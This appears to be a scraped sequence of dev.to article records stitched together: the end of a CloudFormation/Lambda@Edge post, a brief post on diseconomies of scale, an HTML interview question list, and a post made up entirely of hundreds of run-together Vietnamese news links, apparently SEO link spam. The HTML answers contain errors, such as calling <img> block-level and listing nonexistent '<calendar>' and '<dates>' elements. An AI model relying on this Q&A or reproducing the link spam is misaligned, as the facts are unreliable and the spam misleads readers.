- ViewerResponseLambdaArnSet
- EventType: viewer-response
LambdaFunctionARN: !Ref ViewerResponseLambdaArn
- !Ref AWS::NoValue
TargetOriginId: !Sub ${ProjectName}-origin
ViewerProtocolPolicy: redirect-to-https
DefaultRootObject: !Ref DefaultRootObject
Enabled: True
Origins:
- DomainName: !Sub ${StorageBucket}.s3.amazonaws.com
Id: !Sub ${ProjectName}-origin
S3OriginConfig:
OriginAccessIdentity: !Sub origin-access-identity/cloudfront/${OriginAccessIdentity}
PriceClass: PriceClass_100
Tags:
- Key: Name
Value: !Sub ${ProjectName}
```
## Conclusion
Even though CloudFront doesn't support these deployments techniques out of the box Lambda, as so many times before, come to the rescue. The versatility of AWS Lambda is truly a miracle! Download the code and take it for spin!
Happy hacking!
[lambda-at-edge-doc-restrictions-link]: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide | jimmydqv |
708,930 | Diseconomies of Scale | We’ve all heard of economies of scale: the increase in per-unit efficiency by producing or doing a... | 0 | 2021-05-30T21:23:29 | https://jhall.io/archive/2021/05/26/diseconomies-of-scale/ | scaling, efficiency, practices, team | ---
title: Diseconomies of Scale
published: true
date: 2021-05-26 00:00:00 UTC
tags: scaling,efficiency,practices,team
canonical_url: https://jhall.io/archive/2021/05/26/diseconomies-of-scale/
---
We’ve all heard of economies of scale: the increase in per-unit efficiency by producing or doing a large number of like things. This simple concept is probably the single biggest idea responsible for the industrial revolution.
And it’s become such an implicit part of our thinking that we often forget that not everything benefits from economies of scale. Some things have _diseconomies of scale_. Some things have both, with an inflection point of maximal efficiency:

_[Image source](https://boycewire.com/types-of-diseconomies-of-scale/)_
Finding this point is rarely easy in a practice as complex as software development, but it’s worth making an effort to at least get closer to it!
* * *
_If you enjoyed this message, [subscribe](https://jhall.io/daily) to <u>The Daily Commit</u> to get future messages to your inbox._ | jhall |
708,967 | Most Asked Html Questions | 1.Why are you interested in using HTML to build websites? Ans:“Web-building tools are great for profe... | 0 | 2021-05-26T08:37:05 | https://dev.to/iftakher99/most-asked-html-questions-1ae2 | html | **1.Why are you interested in using HTML to build websites?**
Ans:“Web-building tools are great for professional developers, but I think it’s important to understand the underlying technology so I have more control over how sites look and behave. For instance, when I use WordPress to build a site, I often find that I can get better results by inserting my own HTML instead of relying on the provided tools.”
**2.Do you know any other languages that make you a better website developer?**
Ans:Once I started developing larger websites, I learned CSS so I wouldn’t have to update each page’s appearance by hand. I also have some experience with JavaScript. I only know the basic functions, but I can use them to make websites more useful and interactive. I’ve been watching tutorials to make my JavaScript capabilities more robust beside i know bootstrap, React.js, Material ui ,Nodejs , Express js,MongoDB,FireBase Redux and More.
**3.What’s the difference between a block-level element and an inline element?**
Ans:Each element in HTML is displayed in one of a few ways. By default, most tags are either displayed as block-level or inline. This value can be overridden using CSS.
Block
As the name suggests, a block-level element is drawn as a block that stretches to fill the full width available to it (the width of its container) and will always start on a new line.
Examples of elements that are block-level by default: <div>, <img>, <section>, <form>, <nav>.
Inline
Unlike the block-level elements, inline elements are drawn where they are defined and only take up space that is absolutely needed. The easiest way to understand how they work is to look at how text flows on a page. When a line of text gets to the end of the space available, it wraps onto the next line and happily keeps going. If you were to tack more text onto an existing line of text, it will stay on the same line, as if it was all part of the same text to begin with.
Examples of elements that are inline by default: <span>, <b>, <strong>, <a>, <input>.
**4.Say some about new feature Semantic added to HTML5?**
It introduced a number of semantic elements, which is to say elements that convey meaning. Some of the new semantic elements are <header>, <footer>, <section>, and <article> . They are semantic in that they are not just simple containers, but they tell the browser more about their contents.
There are additional form element types, like "number", "date", "calendar" and "range". Video and audio elements have also been added, as well as new graphic elements, such as <svg> and <canvas>.
**5. What are some of the key new features in HTML5?**
Some features you could mention include:
Improved support for embedding rich content like graphics, audio, and video
The introduction of web workers
New semantic tags including <main>, <nav>, <article>, <section>, <header>, <footer>, and <aside>
Extensions to the JavaScript API
Additional form controls like <calendar>, <dates>, <time>, <email>, <url>, and <search>
Some advantages of HTML5 are:-
It has Multimedia Support.
It has capabilities to store offline data using SQL databases and application cache.
Javascript can be run in the background.
HTML5 also allows users to draw various shapes like rectangles, circles, triangles, etc.
Included new Semantic tags and form control tags.
**6.What are tags and attributes in HTML?**
Tags are the primary component of the HTML which defines how the content will be structured/ formatted, whereas Attributes are used along with the HTML tags to define the characteristics of the element. For example, <p align=”center”>Interview questions</p>, in this the ‘align’ is the attribute using which we will align the paragraph to show in the center of the view.
**7.What is the significance of <head> and <body> tag in HTML?**
<head> tag provides the information about the document. It should always be enclosed in the <html> tag. This tag contains the metadata about the webpage and the tags which are enclosed by head tag like <link>, <meta>, <style>, <script>, etc. are not displayed on the web page. Also, there can be only 1 <head> tag in the entire Html document and will always be before the <body> tag.
<body> tag defines the body of the HTML document. It should always be enclosed in the <html> tag. All the contents which needs to be displayed on the web page like images, text, audio, video, contents, using elements like <p>, <img>, <audio>, <heading>, <video>, <div>, etc. will always be enclosed by the <body> tag. Also, there can be only 1 body element in an HTML document and will always be after the <head> tag.
** 8.Can we display a web page inside a web page or Is nesting of webpages possible?**
Ans:Yes, we can display a web page inside another HTML web page. HTML provides a tag <iframe> using which we can achieve this functionality.
<iframe src=”url of the web page to embed” />
| iftakher99 |
709,005 | Chia sẻ 750+ link báo hay và chất lượng | http://baobinhduong.vn/xay-nha-dac-biet-de-an-nau-trong-ngay-tan-the-a87204.htmlhttps://baotayninh.vn... | 0 | 2021-05-26T09:50:34 | https://dev.to/kinhennho/chia-s-750-link-bao-hay-va-ch-t-l-ng-1ik | linkbaochatluong, linkbaohay | http://baobinhduong.vn/xay-nha-dac-biet-de-an-nau-trong-ngay-tan-the-a87204.htmlhttps://baotayninh.vn/xay-nha-nhan-ai-cho-thanh-nien-ngheo-a114790.htmlhttp://hatinh24h.com.vn/nguoi-dan-chi-hang-tram-trieu-dong-xay-nha-lau-cho-heo-tranh-lu-a77072.htmlhttp://baolangson.vn/quoc-te/324262-australia-chi-hon-700-trieu-usd-xay-nha-may-san-xuat-vacxin.htmlhttps://baodansinh.vn/lai-suat-cho-vay-xay-nha-o-xa-hoi-la-45---5nam-22999.htmhttp://hatinh24h.com.vn/nam-tan-suu-2021-xay-nha-theo-nhung-huong-nay-mang-lai-dai-cat-dai-loi-a149268.htmlhttps://giaoducthoidai.vn/kinh-te-xa-hoi/nam-2021-truong-hop-xay-nha-o-nao-duoc-mien-giay-phep-xay-dung-AiT1tqAGR.htmlhttps://baodansinh.vn/quang-binh-phan-bo-them-17-ty-dong-xay-nha-o-phong-tranh-bao-lut-cho-ho-ngheo-58599.htmhttps://baothuathienhue.vn/dieu-kien-ho-kinh-doanh-duoc-tham-do-khoang-san-lam-vat-lieu-xay-dung-thong-thuong-a34984.htmlhttp://nghean24h.vn/xay-nha-pho-sai-gon-35-tang-co-san-vuon-voi-13-ty-a505359.htmlhttps://baotayninh.vn/750-trieu-dong-xay-nha-mai-am-mobifone-a86607.htmlhttps://daklak24h.com.vn/kinh-te/18657/dung-chuyen-dat-rung-de-xay-nha-may-thuy-dien-drang-phok.htmlhttp://thanhnienviet.vn/2019/11/08/pham-tam-tai-co-xay-nha-nam-2020-duoc-khong/http://hatinh24h.com.vn/ha-tinh-nguon-vat-lieu-xay-dung-doi-dao-dang-bi-bo-quen-a108273.htmlhttps://reatimes.vn/bien-dong-gia-nha-o-va-vat-lieu-xay-dung-gop-phan-tang-013-cpi-thang-11-20191129115245860.htmlhttp://baolangson.vn/quoc-te/305166-nhat-ban-ky-thoa-thuan-xay-nha-may-dien-mat-troi-lon-dau-tien-o-qatar.htmlhttps://reatimes.vn/de-xuat-xay-nha-hat-1500-ty-dong-o-thu-thiem-bang-tien-ban-dau-gia-khu-dat-23-le-duan-29908.htmlhttps://www.bienphong.com.vn/xay-nha-tang-tre-mo-coi-post21182.htmlhttps://tieudungplus.vn/nganh-vat-lieu-xay-dung-lao-dao-truoc-kho-khan-kep-20200328212557128.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/70984/title/Bo-Tu-lenh-Bo-doi-Bien-phong-Ho-tro-60-trieu-dong-xay-nha-tinh-nghia-http://vinh24h.vn/ngang-nhien-bit-duong-xuong-bien-de-chua-vat-lieu-xay-dung-a113018.htmlhttps://reatimes.vn/doi-von-xay-nha-cho-nguoi-thu-nhap-thap-28109.htmlhttps://baoangiang.com.vn/cho-moi-phat-dong-ho-tro-xay-nha-cho-ho-ngheo-giai-doan-2020-2025-a278152.htmlhttp://baoyenbai.com.vn/18/138195/Lanh_dao_Israel_tiep_tuc_phe_duyet_ke_hoach_xay_nha_dinh_cu_moi.aspxhttps://reatimes.vn/tre-vat-lieu-xay-dung-hoan-hao-cho-cong-trinh-xanh-19412.htmlhttp://hatinh24h.com.vn/tu-van-xay-nha-ba-tang-850-trieu-o-sai-gon-a91054.htmlhttps://tieudungplus.vn/san-pham-hang-hoa-vat-lieu-xay-dung-dua-ra-thi-truong-phai-dat-tieu-chuan-da-cong-bo-20201231000000916.htmlhttps://giaoducthoidai.vn/gia-dinh/tuoi-nao-xay-nha-nam-tan-suu-2021-de-don-duoc-cat-lanh-OQtvC0LMg.htmlhttps://reatimes.vn/go-doc-can-se-lam-mua-lam-gio-tai-thi-truong-vat-lieu-xay-dung-chau-a-2776.htmlhttp://baobinhduong.vn/bai-tap-ket-vat-lieu-xay-dung-anh-huong-cuoc-song-nguoi-dan-chinh-quyen-dia-phuong-vao-cuoc-xu-ly-a222440.htmlhttp://baoquangtri.vn/Xa-hoi/modid/420/ItemID/58444/title/Hon-3-ti-dong-xay-nha-cong-vu-cho-giao-vien-https://reatimes.vn/doanh-nghiep-nganh-vat-lieu-xay-dung-can-duoc-ho-tro-ve-chinh-sach-1608694278526.htmlhttp://danang24h.vn/tu-nam-2021-dat-quy-hoach-treo-van-co-the-xay-nha-moi-a157037.htmlhttp://nghean24h.vn/kinh-cuong-luc-bat-ngo-vo-roi-trung-dau-em-be-dang-choi-trong-nha-khien-nhieu-nguoi-hoang-so-a585837.htmlhttps://reatimes.vn/tphcm-xay-nha-hat-khong-anh-huong-den-loi-ich-nguoi-dan-thu-thiem-401012.htmlhttps://reatimes.vn/doanh-nghiep-san-xuat-vat-lieu-xay-dung-viet-noi-lo-doi-pho-hang-trung-quoc-17330.htmlhttps://baotuyenquang.com.vn/xa-hoi/cuoc-song/ho-tro-ho-ngheo-xay-nha-ve-sinh-124058.htmlhttps://baodansinh.vn/lao-cai-xay-nha-ve-sinh-nha-tam-cho-cac-truong-hoc-77851.htmhttp://hatinh24h.com.vn/ba-noi-lo-khi-xay-nha-a109254.htmlhttps://baodansinh.vn/cap-giay-phep-lao-dong-va-xay-nha-cho-nguoi-lao-dong-tai-kcnc-hoa-lac-59835.htmhttps://nguoidothi.net.vn/canh-bao-ve-cuoc-chay-dua-xay-nha-may-dien-mat-troi-16259.htmlhttps://baodansinh.vn/gia-lai-dung-dat-xay-nha-may-lam-san-tap-danh-golf-97017.htmhttp://baobinhduong.vn/khuyen-khich-doanh-nghiep-san-xuat-vat-lieu-xay-dung-ap-dung-cong-nghe-moi-a219681.htmlhttp://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/137129/title/Can-som-khac-phuc-viec-xay-nha-chong-len-duong-giao-thonghttps://baoangiang.com.vn/nhat-ban-phan-doi-nga-xay-nha-trai-tai-cac-dao-tranh-chap-a236986.htmlhttps://www.bienphong.com.vn/bdbp-da-nang-van-dong-200-trieu-dong-xay-nha-tinh-nghia-post88845.htmlhttps://baotayninh.vn/vu-xay-nha-lan-chiem-hem-cong-cong-lai-xin-hop-thuc-hoa-xin-chu-truong-ban-dat-cho-nguoi-lan-chiem-dat-cong--a41958.htmlhttps://baodansinh.vn/nguoi-xay-nha-cho-chim-yen-dem-ca-phao-mam-tom-tan-cong-thi-truong-my-7314.htmhttps://baotayninh.vn/bo-xay-dung-chinh-sach-ho-tro-nguoi-ngheo-xay-nha-hien-nay-la-phu-hop-a89776.htmlhttp://nghean24h.vn/nguoi-than-bi-thu-xa-xay-nha-trai-phep-tren-dat-nong-nghiep-a512340.htmlhttps://baodansinh.vn/khong-su-dung-von-nha-nuoc-xay-nha-ga-t3-san-bay-tan-son-nhat-20200114150000201.htmhttp://baoyenbai.com.vn/22/45476/Hon_865_trieu_USD_xay_nha_may_nhiet_dien_Thang_Long.aspxhttp://baolangson.vn/xa-hoi/37950-phong-trao-hien-dat-xay-nha-van-hoa-thon-o-dong-buc.htmlhttps://nguoidothi.net.vn/thu-tuong-chua-xay-nha-cao-tang-khi-phuong-an-giao-thong-chua-co-loi-ra-6681.htmlhttps://reatimes.vn/ha-noi-lenh-xu-ly-tinh-trang-no-ro-xay-nha-tren-dat-nong-nghiep-20200229223018669.htmlhttp://baobinhduong.vn/tan-hiep-phat-dau-tu-4-000-ty-dong-xay-nha-may-nuoc-giai-khat-o-hau-giang-a197754.htmlhttp://baolangson.vn/xa-hoi/42844-ldld-tinh-tham-va-ho-tro-kinh-phi-xay-nha-mai-am-tinh-thuong-cho-doan-vien-lao-dong-ngheo.htmlhttps://reatimes.vn/5-bi-quyet-de-xay-nha-sieu-nho-ban-khong-nen-bo-qua-23394.htmlhttp://baolangson.vn/quoc-te/100898-can-danh-gia-toan-dien-ve-anh-huong-cua-du-an-thuy-dien-xay-nha-bu-ri.htmlhttps://baodansinh.vn/yeu-da-lat-cap-vo-chong-9x-quyet-roi-sai-gon-ve-xay-nha-vuon-binh-yen-song-cuoc-song-mo-uoc-22202027155021600.htmhttp://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thua-2-tran-lien-tiep-a236569.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/66290/title/Xay-nha-tinh-thuong-cho-phu-nu-ngheo-https://baodongkhoi.vn/dai-hoi-chi-bo-3-thuoc-dang-bo-cong-ty-co-phan-vat-lieu-xay-dung-nhiem-ky-2018-2020-31032018-a48061.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/95791/title/Giai-ngan-von-vay-xay-nha-phong-tranh-bao-lu-cho-ho-ngheohttp://baoquangtri.vn/Kinh-te/modid/419/ItemID/25590/title/Hoi-Phu-nu-tinh-Quang-Tri-Ho-tro-tren-977-trieu-dong-xay-nha-Dai-doan-ket-cho-ho-ngheo-http://hatinh24h.com.vn/tp-ha-tinh-xe-cho-vat-lieu-xay-dung-lam-hong-duong-a2618.htmlhttp://baoyenbai.com.vn/13/45592/12_trieu_USD_xay_nha_chong_bao_lu_cho_nguoi_ngheo.aspxhttp://baoyenbai.com.vn/18/64983/Trung_Quoc_se_xay_nha_may_dien_hat_nhan_gan_Viet_Nam.aspxhttp://thanhnienviet.vn/2019/10/24/nguoi-nhat-xay-nha-ong-30m2-gon-xinh-ma-van-thoang-dang/https://reatimes.vn/phat-trien-vat-lieu-xay-dung-ben-vung-khoa-hoc-cong-nghe-phai-di-truoc-1607660355639.htmlhttps://reatimes.vn/dat-xay-nha-o-cho-cong-nhan-ai-huong-loi-36391.htmlhttp://baolangson.vn/xa-hoi/37701-dak-nong-dau-tu-150-ty-dong-xay-nha-tang-dong-bao-dan-toc-thieu-so-ngheo.htmlhttp://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/104793/title/De-nghi-truy-to-can-bo-phuong-bao-ke-xay-nha-trai-phep-https://baodansinh.vn/thanh-hoa-xay-nha-may-xu-ly-rac-thai-gan-650-ty-dong-44671.htmhttps://reatimes.vn/thi-truong-bat-dong-san-kem-soi-dong-gia-vat-lieu-xay-dung-cuoi-nam-the-nao-20190923160936837.htmlhttp://thanhnienviet.vn/2021/02/16/porsche-khong-co-y-dinh-xay-nha-may-hay-lap-rap-o-to-o-trung-quoc-vi-khach-muon-xe-san-xuat-tai-duc/https://baodansinh.vn/cong-ty-dien-luc-ha-tinh-xay-nha-tinh-nghia-tang-me-viet-nam-anh-hung-66632.htmhttps://reatimes.vn/tphcm-thao-do-cac-thuy-dai-de-xay-nha-giu-xe-cao-tang-8802.htmlhttps://reatimes.vn/that-bai-cua-nguoi-dan-ba-xay-nha-4899.htmlhttps://www.bienphong.com.vn/ho-tro-30-trieu-dong-xay-nha-o-cho-ho-giao-dan-o-vinh-an-post17954.htmlhttp://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thang-hang-doi-manh-2019-chien-thang-cua-long-qua-cam-a190578.htmlhttp://baoquangtri.vn/Xa-hoi/modid/420/ItemID/17175/title/Xay-nha-cho-sinh-vien-Kien-nghi-dau-tu-tiep-4800-ty-donghttp://nghean24h.vn/chia-nhau-3000-ty-ca-lang-xay-nha-lau-sam-o-to-a513114.htmlhttps://baodongkhoi.vn/cuu-chien-binh-duong-van-an-ho-tro-xay-nha-nghia-tinh-dong-doi-05072012-a24638.htmlhttp://thanhnienviet.vn/2020/10/23/ai-noi-me-don-than-thi-khong-the-xay-nha-tien-ty/http://baoyenbai.com.vn/12/157601/Mitsubishi_Motors_se_xay_nha_may_san_xuat_oto_thu_hai_tai_Viet_Nam.aspxhttp://vinh24h.vn/nghe-an-chi-dao-xu-ly-su-dung-tro-xi-thach-cao-lam-vat-lieu-xay-dung-a136830.htmlhttp://hatinh24h.com.vn/xay-nha-ong-2-tang-3-phong-ngu-hien-dai-sang-trong-chang-bao-gio-loi-mot-gia-chua-toi-400-trieu-a74422.htmlhttp://nguoilambao.vn/hau-covid-19-nganh-vat-lieu-xay-dung-vuot-kho-de-phuc-hoi-n18613.htmlhttps://baodansinh.vn/ninh-binh-xay-nha-mai-am-tinh-thuong-nha-nhan-ai-cho-hoi-vien-hoi-phu-nu-20191018141229422.htmhttps://www.bienphong.com.vn/khoi-cong-xay-nha-dai-doan-ket-cho-phu-nu-ngheo-don-than-post437603.htmlhttp://baoyenbai.com.vn/12/69191/Nhat_Ban_se_xay_nha_may_loc_dau_lon_nhat_Viet_Nam__.aspxhttps://reatimes.vn/don-doc-chuyen-muc-dan-ong-xay-nha-cung-anh-chanh-van-hoang-anh-tu-3991.htmlhttps://tieudungplus.vn/vat-lieu-xay-dung-sinh-hoc-doi-song-xanh-kinh-te-vung-31657.htmlhttps://reatimes.vn/chai-nhua-bo-di-tro-thanh-gach-xay-nha-19904.htmlhttp://baobinhduong.vn/xay-nha-sai-vi-tri-dat-keo-theo-nhieu-he-luy--a233765.htmlhttps://baodansinh.vn/mat-2-nam-de-tiet-kiem-19-ty-de-mua-dat-xay-nha-vo-chong-tre-da-thuc-hien-giac-mo-voi-ngoi-nha-nho-xinh-2220205722311397.htmhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/57030/title/Trieu-Phong-Phat-trien-manh-nganh-san-xuat-khai-thac-vat-lieu-xay-dung-https://baodansinh.vn/hoang-mainghe-an-thi-nhau-xay-nha-cho-boi-thuong-15435.htmhttps://reatimes.vn/khong-co-vat-lieu-xay-dung-than-thien-thi-khong-the-co-cong-trinh-xanh-8241.htmlhttps://reatimes.vn/tuoi-nao-xay-nha-phat-tai-nhat-nam-dinh-dau-2017-3883.htmlhttp://baobinhduong.vn/trung-tam-nhan-dao-que-huong-khoi-cong-xay-nha-o-va-truong-tieu-hoc-a74401.htmlhttps://www.bienphong.com.vn/don-bien-phong-tri-le-khoi-cong-xay-nha-moi-cho-tre-mo-coi-post315209.htmlhttp://baolangson.vn/chinh-tri/15173-tong-bi-thu-chu-tich-nuoc-lao-chum-ma-ly-xay-nha-xon-tiep-doan-dai-bieu-dang-ta.htmlhttps://reatimes.vn/binh-duong-xay-nha-o-xa-hoi-100-200-trieu-can-the-nao-400031.htmlhttps://baodansinh.vn/ha-tinh-vietinbank-ho-tro-xay-nha-tinh-nghia-cho-nguoi-gia-don-than-kho-khan-20200524081548528.htmhttps://baotayninh.vn/dat-nao-vet-kenh-tieu-bau-coi-se-duoc-dung-lam-vat-lieu-xay-dung-a3501.htmlhttps://reatimes.vn/doanh-nghiep-go-roi-diem-nghen-trong-bai-toan-xay-nha-o-xa-hoi-25265.htmlhttp://thanhnienviet.vn/2020/07/01/vo-chong-tre-xay-nha-3-tang-chuan-sang-xin-min-voi-chi-phi-bat-ngo/https://reatimes.vn/trung-quoc-xay-nha-ve-sinh-bang-kinh-trong-suot-de-du-khach-tien-ngam-canh-1365.htmlhttp://thanhhoa24h.net.vn/yen-thanh-nghe-an-ngang-nhien-chiem-duong-trong-cay-xay-nha-a20612.htmlhttps://reatimes.vn/thi-truong-vat-lieu-xay-dung-san-sang-de-vuon-ra-the-gioi-31939.htmlhttp://thanhnienviet.vn/2019/11/23/xay-nha-nhat-dinh-phai-biet-ro-nhung-loai-mong-co-ban-sau/http://tintucmientay.com.vn/tien-giang-de-nghi-lam-ro-vu-xay-nha-tinh-thuong-nhieu-khuat-tat-a119478.htmlhttp://nghean24h.vn/bo-het-cac-thiet-bi-chong-trom-di-chi-can-hoc-cach-xay-nha-chong-trom-cuc-hieu-qua-nay-cua-nguoi-nhat-a482524.htmlhttps://reatimes.vn/han-quoc-xay-nha-may-san-xuat-dong-co-may-bay-o-hoa-lac-15049.htmlhttps://giaoducthoidai.vn/ket-noi/dak-nong-co-giao-vung-cao-xin-com-xay-nha-ban-tru-cho-hoc-tro-ngheo-3787617.htmlhttp://antt.vn/de-xuat-khong-duoc-dung-dat-san-golf-de-xay-nha-ban-259203.htmhttp://antt.vn/cu-tri-de-nghi-ha-noi-xu-tinh-trang-lo-xay-nha-de-ban-bo-quen-truong-hoc-295242.htmhttps://baodansinh.vn/cao-bang-xe-tai-cho-vat-lieu-xay-dung-bat-ngo-lat-chan-ngang-quoc-lo-giao-thong-te-liet-hoan-toan-2019110212193139.htmhttp://nghean24h.vn/chu-nha-phai-khau-chuc-mui-vi-vo-kinh-cuong-luc-nha-tam-a486988.htmlhttps://tieudungplus.vn/vi-pham-ve-san-xuat-vat-lieu-xay-dung-co-su-dung-amiang-trang-phat-den-90-trieu-dong-22191.htmlhttps://baoquangbinh.vn/goc-thu-gian/202007/nhiep-anh-gia-xay-nha-gan-ong-kinh-dat-ten-con-theo-cac-hang-may-anh-2179301/http://baolangson.vn/xa-hoi/34004-cho-phep-ap-dung-chinh-sach-uu-dai-doi-voi-du-an-xay-nha-tang-le-tren-dia-ban-ha-noi.htmlhttps://reatimes.vn/tap-doan-tt-xay-nha-may-xu-ly-chat-thai-nghin-ty-tai-thai-nguyen-20190923163904056.htmlhttps://reatimes.vn/vingroup-se-xay-nha-sieu-re-200-trieu-dong-26261.htmlhttp://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/147333/title/Tang-cuong-xu-ly-cac-xe-cho-vat-lieu-xay-dung-vi-phamhttps://baodansinh.vn/xay-nha-mai-am-cong-doan-cho-giao-vien-co-hoan-canh-kho-khan-20190911062601.htmhttp://nghean24h.vn/da-co-kinh-cuong-luc-gorilla-glass-the-he-5-sieu-ben-a414979.htmlhttps://www.bienphong.com.vn/don-bien-phong-cua-khau-quoc-te-la-lay-khoi-cong-xay-nha-nghia-tinh-bien-gioi-post297115.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/152087?title=Gan-600-trieu-dong-trao-qua-ho-tro-xay-nha-tinh-thuong-cho-nguoi-dan-vung-kho-bi-anh-huong-do-COVID-%E2%80%93-19http://baoyenbai.com.vn/18/133028/Nhat_Ban_xay_nha_may_dien_mat_troi_noi_lon_nhat_the_gioi.aspxhttp://baobinhduong.vn/van-dong-ung-ho-xay-nha-dai-doan-ket-tren-huyen-dao-truong-sa-a178061.htmlhttp://baolangson.vn/giao-duc/162097-nam-hoc-moi-can-quan-tam-dau-tu-xay-nha-ve-sinh-trong-truong-hoc.htmlhttp://antt.vn/mua-dat-du-an-duoc-phe-duyet-20-nam-van-khong-the-xay-nha-295059.htmhttps://baodansinh.vn/thua-thien-hue-tiep-nhan-500-trieu-dong-ho-tro-xay-nha-chong-lu-cho-nguoi-dan-20201116151624235.htmhttps://baodansinh.vn/nghe-an-xay-nha-tinh-nghia-tham-tinh-quan-dan-20200828114620783.htmhttps://nguoidothi.net.vn/tp-hcm-siet-chat-du-an-xay-nha-cao-tang-trong-khu-trung-tam-nen-trien-khai-som-25452.htmlhttps://reatimes.vn/chi-so-vi-mo-thang-12-2018-cpi-nha-o-va-vat-lieu-xay-dung-giam-089-32530.htmlhttp://baobinhduong.vn/so-xay-dung-trien-khai-quy-chuan-quoc-gia-ve-san-pham-hang-hoa-vat-lieu-xay-dung-a120125.htmlhttp://thanhnienviet.vn/2021/01/13/gia-chu-soc-trang-xay-nha-ong-de-chiu-nhu-resort-tren-manh-dat-vua-hep-vua-dai/https://baothuathienhue.vn/bao-hiem-xa-hoi-viet-nam-xay-nha-tinh-nghia-a29533.htmlhttps://reatimes.vn/thi-truong-vat-lieu-xay-dung-nhan-tin-hieu-moi-dau-quy-ii-24059.htmlhttp://thanhhoa24h.net.vn/16-nam-nuoi-uoc-nguyen-xay-nha-tho-to-cua-hoai-linh-a42047.htmlhttp://baobinhduong.vn/phe-duyet-chien-luoc-phat-trien-vat-lieu-xay-dung-a229624.htmlhttps://baodansinh.vn/vat-lieu-xay-dung-an-toan-than-thien-voi-moi-truong-va-xu-huong-su-dung-2020070209554358.htmhttps://baodansinh.vn/san-khau-tu-te-khong-the-xay-nha-tu-noc-57457.htmhttps://reatimes.vn/da-nang-xay-nha-chong-bao-cho-phu-nu-ngheo-7434.htmlhttp://baolangson.vn/quoc-te/113222-israel-tiep-tuc-cap-phep-xay-nha-dinh-cu-tai-dong-jerusalem.htmlhttps://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/giam-dien-tich-khu-cong-nghiep-trang-due-de-xay-nha-o-cho-cong-nhan-76192.htmlhttp://thanhnienviet.vn/2020/05/16/cach-xay-nha-tiet-kiem-chi-phi-nhat-5-kinh-nghiem-khong-phai-ai-cung-biet/http://hatinh24h.com.vn/ha-tinh-ho-bien-hanh-lang-quoc-lo-thanh-bai-tap-ket-vat-lieu-xay-dung-a8566.htmlhttps://nguoidothi.net.vn/tp-hcm-phan-cap-xu-ly-cac-truong-hop-lan-chiem-kenh-rach-xay-nha-o-cong-trinh-22231.htmlhttp://danang24h.vn/da-nang-via-he-tuyen-kenh-bac-son-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-a113041.htmlhttps://nguoidothi.net.vn/tp-hcm-nghien-cuu-khong-cap-phep-xay-nha-rieng-le-9301.htmlhttp://nghean24h.vn/nghe-an-chi-dao-xu-ly-su-dung-tro-xi-thach-cao-lam-vat-lieu-xay-dung-a587711.htmlhttp://nguoihanoi.com.vn/da-nang-siet-xay-nha-cao-tang-tai-khu-vuc-trung-tam_247049.htmlhttps://baotayninh.vn/vu-xay-nha-lan-hem-cong-cong-xin-hop-thuc-hoa-vi-sao-cac-co-quan-quan-ly-trat-tu-do-thi-chua-kien-quyet-xu-ly-a41833.htmlhttps://baodansinh.vn/thanh-hoa-trao-tang-xe-lan-cho-cac-chau-bai-nao-va-ho-tro-xay-nha-59884.htmhttp://hatinh24h.com.vn/geleximco-muon-xay-nha-may-nhiet-dien-ty-usd-voi-doi-tac-trung-quoc-a93858.htmlhttp://baobinhduong.vn/dau-gia-quyen-khai-thac-khoang-san-lam-vat-lieu-xay-dung-thong-thuong-a194512.htmlhttp://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/146249/title/Hoi-am-vu-xay-nha-tren-duong-giao-thong-o-thon-Tra-Loc-xa-Hai-Xuan-huyen-Hai-Lang-Da-thao-do-phan-nha-xay-dung-tren-duong-giao-thonghttps://baodansinh.vn/la-lung-chuyen-xay-nha-tro-de-nuoi-ga-o-nghe-an-36672.htmhttp://baolangson.vn/chinh-tri/8405-thao-go-vuong-mac-trong-xay-nha-o-cho-nguoi-ngheo-tai-an-giang.htmlhttps://tieudungplus.vn/dat-nuoi-trong-thuy-san-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-38654.htmlhttps://giaoducthoidai.vn/khoa-hoc/vat-lieu-xay-dung-lam-gia-tang-o-nhiem-khong-khi-3829981.htmlhttp://baolangson.vn/xa-hoi/29377-tu-nam-2011-su-dung-gach-khong-nung-loai-nhe-de-xay-nha-cao-tang.htmlhttp://baoyenbai.com.vn/18/128667/Ukraine_huy_bo_thoa_thuan_xay_nha_may_dien_hat_nhan_voi_Nga.aspxhttp://baolangson.vn/xa-hoi/37271-ha-noi-day-manh-xay-nha-cho-cong-nhan-sinh-vien.htmlhttp://thanhnienviet.vn/2020/10/14/tp-hcm-tiep-tuc-han-che-xay-nha-cao-tang-tai-quan-1-quan-3/http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thanh-cong-den-tu-gian-kho-a214943.htmlhttps://giaoducthoidai.vn/phap-luat/ha-noi-ke-sat-hai-ba-chu-cua-hang-vat-lieu-xay-dung-roi-nem-xac-ngoai-bai-rac-khai-gi--3799072.htmlhttps://giaoducthoidai.vn/van-hoa/vu-hoang-viet-xay-nha-pho-10-ty-dat-vang-bat-ngo-nam-o-tren-tang-thuong-3802736.htmlhttp://thanhhoa24h.net.vn/du-an-gach-khong-nung-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-a142686.htmlhttps://giaoducthoidai.vn/phap-luat/hieu-truong-lan-chiem-dat-hang-tram-m2-duong-dan-sinh-xay-nha-chinh-quyen-bat-luc--3825793.htmlhttp://thanhnienviet.vn/2020/05/06/ban-hanh-quy-chuan-xay-nha-tro-tai-tp-hcm/https://reatimes.vn/kho-khan-bua-vay-doanh-nghiep-vat-lieu-xay-dung-20200401092747080.htmlhttp://baobinhduong.vn/xay-nha-dai-doan-ket-cho-nguoi-ngheo-tiep-them-dong-luc-de-nguoi-ngheo-vuon-len-a233143.htmlhttp://nghean24h.vn/tu-van-xay-nha-hai-tang-60m2-kinh-phi-598-